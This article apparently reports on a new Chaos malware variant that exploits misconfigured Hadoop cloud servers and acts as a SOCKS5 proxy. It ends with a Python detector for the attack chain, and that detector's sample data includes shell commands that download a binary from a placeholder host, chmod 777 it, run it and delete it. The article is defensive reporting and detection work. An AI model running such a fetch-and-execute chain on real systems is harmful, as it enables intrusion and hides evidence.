New Chaos malware targets cloud
A new variant of the Chaos malware is exploiting misconfigured cloud setups and has added proxying features to hide its activity. That makes simple cloud misconfigurations a much more attractive entry point for stealthy intrusions. (x.com)
Cloud break-ins often start with something boring: a server left exposed, a port left open, or a service configured to trust the internet when it should trust only a private network. Security teams call that a cloud misconfiguration, and Aqua says it can be as simple as public access, exposed keys, or unrestricted ports. (aquasec.com)

Chaos is malware: a small program an attacker drops onto a machine so that it will obey remote commands later. Lumen’s Black Lotus Labs first documented Chaos in September 2022 as a cross-platform tool for Windows and Linux that could run shell commands, add new modules, mine cryptocurrency, and launch distributed denial-of-service attacks. (thehackernews.com) For most of its life, Chaos went after routers and edge devices, the internet-facing boxes that sit at the perimeter of a network like a front gate. Darktrace says the new variant, seen in March 2026, shifted to misconfigured Linux cloud servers, which puts it inside the infrastructure companies actually use to run applications and data jobs. (helpnetsecurity.com)

Researchers caught the new sample in a honeypot, a decoy system built to attract attackers the way a fake wallet can catch a pickpocket. Darktrace’s CloudyPots network exposed a deliberately misconfigured Apache Hadoop server, and the attackers used a web request to create a new application that ran shell commands on that machine. (helpnetsecurity.com) Those shell commands did four concrete things in order: download a Chaos binary from an attacker-controlled domain, change its permissions with `chmod 777`, execute it, and then delete the file from disk. Deleting the file after launch cuts down the forensic trail, which makes incident response harder once the server is already compromised. (thehackernews.com)

The code itself also changed. Help Net Security reports that this 64-bit Linux sample dropped the older features for spreading through Secure Shell brute force and exploiting router bugs, and replaced them with a SOCKS5 proxy, a relay that lets someone send traffic through another machine the way a getaway driver lets a robber leave in someone else’s car. (helpnetsecurity.com) That proxy gives attackers two useful tricks at once. Darktrace says they can make malicious traffic appear to come from the victim’s internet address, and they can pivot into internal systems that are reachable only from inside that cloud environment. (helpnetsecurity.com)

This is why cloud malware looks different from laptop malware. SentinelOne notes that cloud intrusions often start with exposed web apps, exposed Jenkins servers, or leaked service credentials, because attackers care less about tricking one employee and more about finding one misconfigured service that gives them automation and scale. (sentinelone.com) The result is that a plain setup mistake now does more than invite cryptomining or a denial-of-service bot. With Chaos acting as a proxy on a cloud server, one exposed service can become a hidden launchpad for later attacks, with the victim’s own infrastructure masking where the traffic really started. (thehackernews.com)
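The download, `chmod 777`, execute, delete sequence described above is a detectable pattern in its own right. The Python below is an added example, not code from Darktrace or any of the cited reports: it walks the commands a Hadoop container launch ran (a constructed sample with placeholder domain and path) and flags only the full chain against one file, so a script that merely fetches and runs a tool does not alert.

```python
import shlex
from typing import Dict, List, Optional

# Constructed sample commands, as a Hadoop YARN container launch script might
# run them. The domain and file path are placeholders, not real indicators.
SAMPLE_COMMANDS = [
    "cd /tmp",
    "curl -fsSL http://placeholder.example/stage/bin -o /tmp/.x",
    "chmod 777 /tmp/.x",
    "/tmp/.x",
    "rm -f /tmp/.x",
]

DOWNLOAD_FLAGS = {"curl": ("-o", "--output"), "wget": ("-O", "--output-document")}

def downloaded_path(argv: List[str]) -> Optional[str]:
    """Return the output path of a curl/wget download, or None for other commands."""
    flags = DOWNLOAD_FLAGS.get(argv[0].rsplit("/", 1)[-1]) if argv else None
    if flags is None:
        return None
    for i, arg in enumerate(argv[:-1]):
        if arg in flags:
            return argv[i + 1]
    return None

def fetch_chmod_run_wipe(commands: List[str]) -> Optional[Dict[str, object]]:
    """Flag download -> chmod 777 -> execute -> rm of the same file, in that order.
    Returns the matched step per stage, or None if any stage of the chain is missing."""
    seen: Dict[str, str] = {}
    path: Optional[str] = None
    for cmd in commands:
        argv = shlex.split(cmd)
        if not argv:
            continue
        if path is None:  # still waiting for the download that names the file
            path = downloaded_path(argv)
            if path:
                seen["download"] = cmd
            continue
        name = argv[0].rsplit("/", 1)[-1]
        if name == "chmod" and "777" in argv and path in argv:
            seen["chmod_777"] = cmd
        elif argv[0] == path and "chmod_777" in seen:  # run only after the chmod
            seen["execute"] = cmd
        elif name == "rm" and path in argv and "execute" in seen:  # wipe after run
            seen["delete"] = cmd
    if all(k in seen for k in ("download", "chmod_777", "execute", "delete")):
        return {"path": path, "steps": seen}
    return None
```

Feeding real container launch scripts or shell audit records into `fetch_chmod_run_wipe` turns the reported behaviour into a concrete alert, and the `steps` in the finding preserve the exact commands for the incident record that the deletion step was meant to erase.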